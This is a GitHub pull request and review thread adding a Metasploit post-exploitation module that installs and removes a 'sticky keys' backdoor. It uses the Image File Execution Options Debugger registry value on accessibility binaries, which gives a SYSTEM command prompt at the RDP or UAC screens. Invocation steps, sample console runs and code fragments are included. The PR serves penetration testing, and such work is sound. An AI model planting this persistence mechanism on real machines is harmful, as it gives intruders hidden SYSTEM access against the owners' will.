### PR TITLE
Add the sticky_keys module

### PR DESCRIPTION
**Pull request by OJ**
The `sticky keys` "exploit" is well known by all. Yet for some reason we didn't have a post module in MSF that exposes this handy feature.

This PR contains a new module called `post/windows/manage/sticky_keys`, which supports the addition and removal of the sticky keys exploit using the registry hack approach. The module does require a session with admin rights on the box, but this is a persistence mechanism more than anything else.

The module has `ADD` and `REMOVE` actions, which ... er.. add and remove the backdoor! There are 3 sticky keys targets:
1. `sethc.exe` - Set the `TARGET` to `SETHC`, invoke by pressing `SHIFT` 5 times at the UAC or RDP screens.
2. `utilman.exe` - Set the `TARGET` to `UTILMAN`, invoke by pressing `WINDOWS+U` at the UAC or RDP screens.
3. `osk.exe` - Set the `TARGET` to `OSK`, invoke by pressing `WINDOWS+U` at the UAC or RDP screens, then selecting the "on screen keyboard" checkbox and hitting `OK` or `Apply`.
4. `displayswitch.exe` - Set the `TARGET` to `DISP`, invoke by pressing `WINDOWS+P` at the UAC or RDP screens.
## Sample run

```
msf post(sticky_keys) > show options

Module options (post/windows/manage/sticky_keys):

   Name     Current Setting                Required  Description
   ----     ---------------                --------  -----------
   ACTION   ADD                            yes       Specifies whether to add or remove the exploit. (Accepted: ADD, REMOVE)
   EXE      %SYSTEMROOT%\system32\cmd.exe  yes       Executable to execute when the exploit is triggered
   METHOD   REGISTRY                       yes       The sticky keys method to use. (Accepted: REGISTRY, FILE)
   SESSION  1                              yes       The session to run this module on.
   TARGET   OSK                            yes       The target binary to add the exploit to. (Accepted: SETHC, UTILMAN, OSK)

msf post(sticky_keys) > run

[+] Session has administrator rights, proceeding.
[+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing WINDOWS+U, then launching the on-screen keyboard.
[*] Post module execution completed
```

At this point it is possible to get a command prompt as `NT AUTHORITY\SYSTEM` by either:
- Connecting to the RDP login screen
- Getting a low-priv desktop and running something that requires UAC elevation, resulting in the UAC prompt.

From here use the `WINDOWS+U` combination to show the utilities manager, and then launch the on-screen keyboard.

To remove:

```
msf post(sticky_keys) > set ACTION REMOVE
ACTION => REMOVE
msf post(sticky_keys) > run

[+] Session has administrator rights, proceeding.
[+] 'Sticky keys' removed from registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe.
[*] Post module execution completed
```
## Validation
- [ ] Get a system/admin shell and/or meterpreter session.
- [ ] Configure the module to use the system/admin session.
- [ ] Use the `ADD` method to enable the sticky keys backdoor with `SETHC`, `UTILMAN`, `OSK`, and `DISP` options.
- [ ] Validate that each of these vectors works (RDP and/or UAC prompt).
- [ ] Use the `REMOVE` method to disable this backdoor for each, and validate that the backdoor no longer works.

Thanks to @Peleus for his help in testing.

### CODE REVIEW

**Comment by wvu-r7** [comment]
This is great, @OJ!

**Comment by mubix** [comment]
@OJ Can you add WINDOWS+P  on as well for the Display Switcher: DisplaySwitch.exe is the binary to use.

**Comment by wvu-r7** [comment]
@mubix: +1

**Comment by OJ** [comment]
@mubix support added!

File: modules/post/windows/manage/sticky_keys.rb [hunk 1]
```diff
@@ -0,0 +1,116 @@
...
+  def run
+    unless is_admin?
+      fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')
+    end
+
+    print_good("Session has administrator rights, proceeding.")
+
+    target_key = get_target_exe_reg_key
+
+    if datastore['ACTION'] == 'ADD'
```
Comment (wvu-r7) [inline modules/post/windows/manage/sticky_keys.rb]: You can use ```action.name``` here.

File: modules/post/windows/manage/sticky_keys.rb [hunk 2]
```diff
@@ -0,0 +1,116 @@
...
+        to the target prior to running the module. By default, a SYSTEM command prompt is installed
+        using the registry method if this module is run without modifying any parameters.
+      },
+      'Author'       => ['OJ Reeves'],
+      'Platform'     => ['win'],
+      'SessionTypes' => ['meterpreter', 'cmd']
+    ))
+
+    register_options([
+      OptEnum.new('ACTION', [true, 'Specifies whether to add or remove the exploit.', 'ADD', ['ADD', 'REMOVE']]),
```
Comment (wvu-r7) [inline modules/post/windows/manage/sticky_keys.rb]: You can make this an ```Actions``` array with a ```DefaultAction```.

File: modules/post/windows/manage/sticky_keys.rb [hunk 3]
```diff
@@ -0,0 +1,116 @@
...
+      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),
+      OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered', '%SYSTEMROOT%\system32\cmd.exe'])
```
Comment (wvu-r7) [inline modules/post/windows/manage/sticky_keys.rb]: Would be cool if you could toss a payload back, but that's not the standard use case.

Comment (wvu-r7) [inline modules/post/windows/manage/sticky_keys.rb]: Could just upload it yourself. :)

Comment (OJ) [inline modules/post/windows/manage/sticky_keys.rb]: Yeah, I pondered the whole "support a payload" thing, but decided against it. It complicates the module and kind of doesn't work for this thing anyway. I think if people want their own payloads, then can upload them manually then use this module to wire them in.

File: modules/post/windows/manage/sticky_keys.rb [hunk 4]
```diff
@@ -0,0 +1,116 @@
...
+  def get_target_exe_reg_key
+    "#{DEBUG_REG_PATH}\\#{get_target_exe_name}"
+  end
+
+  #
+  # Runs the exploit.
+  #
+  def run
+    unless is_admin?
+      fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')
```
Comment (wvu-r7) [inline modules/post/windows/manage/sticky_keys.rb]: Maybe reconcile "administrative" with line 99?

File: modules/post/windows/manage/sticky_keys.rb (hunk 2 above)
Comment (OJ) [inline modules/post/windows/manage/sticky_keys.rb]: Really? I've never heard of that. I thought that this was the typical approach! What's a good example?

File: modules/post/windows/manage/sticky_keys.rb (hunk 1 above)
Comment (OJ) [inline modules/post/windows/manage/sticky_keys.rb]: I'll dig up an example and rework it.

File: modules/post/windows/manage/sticky_keys.rb [hunk 5]
```diff
@@ -0,0 +1,116 @@
...
+class Metasploit4 < Msf::Post
+
+  include Msf::Post::File
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Priv
+
+  DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'
+  DEBUG_REG_VALUE = 'Debugger'
+
+  def initialize(info={})
```
Comment (wvu-r7) [inline modules/post/windows/manage/sticky_keys.rb]: Silly, but could you pad the ```=``` with spaces?

**Comment by wvu-r7** [comment]
This is good, clean code, @OJ. I expected nothing less from you. :P

**Comment by OJ** [comment]
Now it goes:
```
msf post(sticky_keys) > show options

Module options (post/windows/manage/sticky_keys):

   Name     Current Setting                Required  Description
   ----     ---------------                --------  -----------
   EXE      %SYSTEMROOT%\system32\cmd.exe  yes       Executable to execute when the exploit is triggered
   SESSION  1                              yes       The session to run this module on.
   TARGET   SETHC                          yes       The target binary to add the exploit to. (Accepted: SETHC, UTILMAN, OSK, DISP)


Post action:

   Name  Description
   ----  -----------
   ADD   Add the backdoor to the target.


msf post(sticky_keys) > show actions

Post actions:

   Name    Description
   ----    -----------
   ADD     Add the backdoor to the target.
   REMOVE  Remove the backdoor from the target
```
and when run:
```
msf post(sticky_keys) > run

[+] Session has administrative rights, proceeding.
[+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing WINDOWS+P.
[*] Post module execution completed
msf post(sticky_keys) > set action REMOVE
action => REMOVE
msf post(sticky_keys) > run

[+] Session has administrative rights, proceeding.
[+] 'Sticky keys' removed from registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe.
[*] Post module execution completed
```

**Comment by OJ** [comment]
Thanks @wvu-r7  :) Made the changes that you suggested. Cheers for the review!

File: modules/post/windows/manage/sticky_keys.rb (hunk 3 above)
Comment (wvu-r7) [inline modules/post/windows/manage/sticky_keys.rb]: I'd rather have the SYSTEM shell, anyway. :)

File: modules/post/windows/manage/sticky_keys.rb [hunk 6]
```diff
@@ -0,0 +1,120 @@
...
+
+        Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded
+        to the target prior to running the module. By default, a SYSTEM command prompt is installed
+        using the registry method if this module is run without modifying any parameters.
+      },
+      'Author'        => ['OJ Reeves'],
+      'Platform'      => ['win'],
+      'SessionTypes'  => ['meterpreter', 'cmd'],
+      'Actions'       => [
+          [ 'ADD',    { 'Description' => 'Add the backdoor to the target.' } ],
```
Comment (wvu-r7) [inline modules/post/windows/manage/sticky_keys.rb]: Brackets and indentation are a bit off.

**Comment by wvu-r7** [comment]
https://github.com/rapid7/metasploit-framework/commit/06ed7ba574d9d157b48c4951a9db18cd70462af9

**Comment by OJ** [comment]
Thank you Will!

**Pull request merged**